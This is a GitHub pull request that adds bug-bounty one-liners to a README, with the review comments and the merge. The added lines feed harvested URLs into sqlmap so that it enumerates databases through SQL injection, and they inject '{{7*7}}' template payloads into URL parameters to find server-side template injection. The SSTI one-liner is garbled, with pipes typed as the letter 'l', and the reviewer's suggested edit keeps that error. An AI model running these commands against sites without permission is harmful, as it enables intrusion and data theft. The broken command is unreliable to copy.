### PR TITLE
Updated :  README.md

### PR DESCRIPTION
**Pull request by Tholkappiar**
Added Exploiting SQL Injection and Automated SSTI One-liners .

### CODE REVIEW

File: README.md [hunk 1]
```diff
@@ -497,3 +497,15 @@ curl -vs URL --stderr - | awk '/^content-security-policy:/' | grep -Eo "[a-zA-Z0
 ```bash
 nmap -v0 HOST -oX /dev/stdout | jc --xml -p | jq -r '.nmaprun.host | (.address["@addr"] + ":" + .ports.port[]["@portid"])' | httpx --silent
 ```
+
+### Filtering URLs and Exploiting SQL Injection
+>@tholkappiar
```
Comment (0xk4b1r) [inline README.md]:
```suggestion
> @tholkappiar
```

File: README.md [hunk 2]
```diff
@@ -497,3 +497,15 @@ curl -vs URL --stderr - | awk '/^content-security-policy:/' | grep -Eo "[a-zA-Z0
...
+```bash
+cat url.txt | gau | egrep -v '(.js|.png|.svg|.gif|.jpg|.txt)'|tee sqli.txt && sqlmap -m sqli.txt -dbs --batch
+```
+
+### Automated SSTI (Server-Side Template Injection) Vulnerability Scanner
+>@tholkappiar
```
Comment (0xk4b1r) [inline README.md]:
```suggestion
> @tholkappiar
```

File: README.md [hunk 3]
```diff
@@ -497,3 +497,15 @@ curl -vs URL --stderr - | awk '/^content-security-policy:/' | grep -Eo "[a-zA-Z0
...
+```bash
+cat urls.txt | gau -subs|grep '='l egrep -v '(.jsl.pngl.svgl.gifl.jpg.jpeg|.txt.css.ico)'l qsreplace "ssti{{7*7}}" | while read url; do cur=$(curl -s $url | grep "ssti49"); echo -e "$url -> $cur"; done
```
Comment (0xk4b1r) [inline README.md]:
```suggestion
cat urls.txt | gau -subs | grep '='l egrep -v '(.jsl.pngl.svgl.gifl.jpg.jpeg|.txt.css.ico)'l qsreplace "ssti{{7*7}}" | while read url; do cur=$(curl -s $url | grep "ssti49"); echo -e "$url -> $cur"; done
```

**Review by 0xk4b1r — CHANGES_REQUESTED** [review]
- space required in some places.

and can u add screenshots of output

Thank you..

**Comment by Tholkappiar** [comment]
**Filtering URLs and Exploiting SQL Injection**

sqli url
sqli sqlmap
**Automated SSTI**

ssti

**Review by 0xk4b1r — APPROVED** [review]
Looks good to me

**Pull request merged**